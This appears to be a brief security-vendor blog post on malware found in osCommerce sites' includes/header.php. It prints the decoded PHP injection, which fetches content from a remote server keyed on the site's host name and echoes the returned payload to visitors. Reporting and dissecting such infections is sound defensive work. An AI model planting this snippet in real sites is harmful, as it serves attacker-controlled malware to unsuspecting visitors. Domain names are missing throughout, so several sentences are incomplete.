Malware update: (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by, and a few others. All the domains involved are hosted at

These domains were registered by, which is also involved on other malicious activities (,,,etc).

The infected sites had a large encoded entry added to the file includes/header.php:


Which when decoded, calls to get what malware to present to the end user:

$url = @file_get_contents($h37.”:”.”//”.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.”.
urlencode($_SERVER[“HTTP_HOST”]));if (strstr($url,”!go!”)){$url = explode(“!go!”,$url); $url =
$url[1];echo $url;}

Some details here as well:

Having issues with malware? Sign up at and we will get it all sorted out.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.